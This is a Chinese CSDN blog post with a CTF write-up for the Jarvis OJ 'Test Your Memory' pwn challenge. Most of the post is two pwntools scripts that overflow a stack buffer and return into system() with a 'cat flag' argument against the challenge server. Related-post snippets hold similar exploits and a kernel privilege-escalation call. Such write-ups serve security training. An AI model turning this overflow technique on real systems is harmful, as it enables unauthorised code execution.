[Jarvis OJ - PWN]——Test Your Memory

最新推荐文章于 2023-05-18 10:27:46 发布
最新推荐文章于 2023-05-18 10:27:46 发布
阅读量218 收藏
点赞数
分类专栏: # Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113826939
版权

[Jarvis OJ - PWN]——Test Your Memory

exploit

from pwn import *
#p = process("./memory")
p = remote("pwn2.jarvisoj.com",9876)
context.log_level = 'debug'
cat_flag_addr = 0x080487E0
sys_addr = 0x080485C9
p.recvuntil('\n------Test Your Memory!-------\n\n')
s2 = p.recv(10)
print s2
payload = (s2 + '\x00').ljust(0x13 + 0x4, 'a') 
payload += p32(sys_addr) + p32(cat_flag_addr)
p.sendlineafter("> ", payload)
p.interactive()

做绕过检查习惯了,一时间没反应过来
其实直接这样写也可以

from pwn import *
#p = process("./memory")
p = remote("pwn2.jarvisoj.com",9876)
context.log_level = 'debug'
cat_flag_addr = 0x080487E0
sys_addr = 0x080485C9
payload = 'a' * (0x13 +0x4)
payload += p32(sys_addr) + p32(cat_flag_addr)
p.sendlineafter("> ", payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
jarvisoj_test_your_memory
m0sway的博客
12-27 1237
jarvisoj_test_your_memory 使用checksec查看: 只开启了栈不可执行,应该还是一道栈溢出题目。 放进IDA中查看: 先是用printf()输出了一个不知道什么玩意的东西 然后调用men_test() 跟进查看men_test(): printf("0x%x \n", hint);:输出了hint的地址 __isoc99_scanf("%s", &s);:存在栈溢出,距离ebp0x13 题目思路: 题目存在栈溢出,可以进行溢出调用system 题目
jarvisoj——Test Your Memory
王嘟嘟的博客
07-31 731
题目 Wp 基本项检查,32位,开了NX,got表可写 这里看到alphanum_2626和mem_test 跟进mem_test,可以看到是scanf 这里可以看到偏移,直接上payload 这里一定要有返回地址,不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e
BUUCTF pwn——jarvisoj_test_your_memory
最新发布
CNS-Enterprise BCC-1701-J
05-18 115
BUUCTF 做题练习
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
JARVIS--AI-Based-Assistant:简单的JARVIS语音助手
04-06
**JARVIS--AI-Based-Assistant: 简单的JARVIS语音助手** JARVIS,这个名字来源于漫威电影中的贾维斯人工智能系统,现在我们将其应用到一个基于AI的语音助手中。这个项目主要使用Python编程语言来实现,为用户提供了...
[JarvisOJ][pwn]Test Your Memory
九层台
07-06 814
经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的 走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数,然后找漏洞吧 int __cdecl mem_test(char *s2) {...
[BUUCTF]PWN——jarvisoj_test_your_memory
mcmuyanga的博客
11-06 460
jarvisoj_test_your_memory 附件 步骤: 例行检查,32位程序,开启了nx保护 试运行一下程序,看看大概的情况 32
Jarvis OJ-PWN
weixin_45461609的博客
08-08 214
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
buuctf pwn wp(第二波)花哨点的AAAA系列
月阴荒的博客
03-21 409
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
JarvisOJ pwn Test Your Memory
苗_的博客
02-24 231
先找到几个关键函数: 单击main看一下函数结构: 点进mem_test看下: 找到溢出点:scanf 点进去hint发现了cat flag字符串..... (问题突然变得很简单....ret2libc) exp: from pwn import * #p = process('./memory') p = remote("pwn2.jarvisoj.com","9876") ...
linux内核pwn,[原创]linux kernel pwn 分析(一) 强网杯core + ciscn babydriver
weixin_42588672的博客
04-29 518
通用的提权代码是commit_creds(prepare_kernel_cred(0));这两个函数如何动态获得?借助/proc/kallsyms符号表,在运行时动态读取。这个很容易实现,贴出一例:unsigned long find_symbol_by_proc(char *file_name, char *symbol_name){FILE *s_fp;char buff[200] = {0}...
pwn入门小技巧
qq_36918532的博客
05-24 2685
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
linux内核pwn,Linux内核pwn——劫持n_tty_ops指针
weixin_42355400的博客
04-29 303
0x001 前言以往多数的kernel pwn题都是基于内核扩展模块的漏洞分析,今天我们来看2018年Midnight Sun CTF一个无*.ko内核模块的题。题目下载:0x002 干掉定时logout由于内核运行一断时间后便会退出,需要解开文件系统,做一定修改mkdir coremv ./core.cpio ./core/cd corecpio -idmv < initrdrm init...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值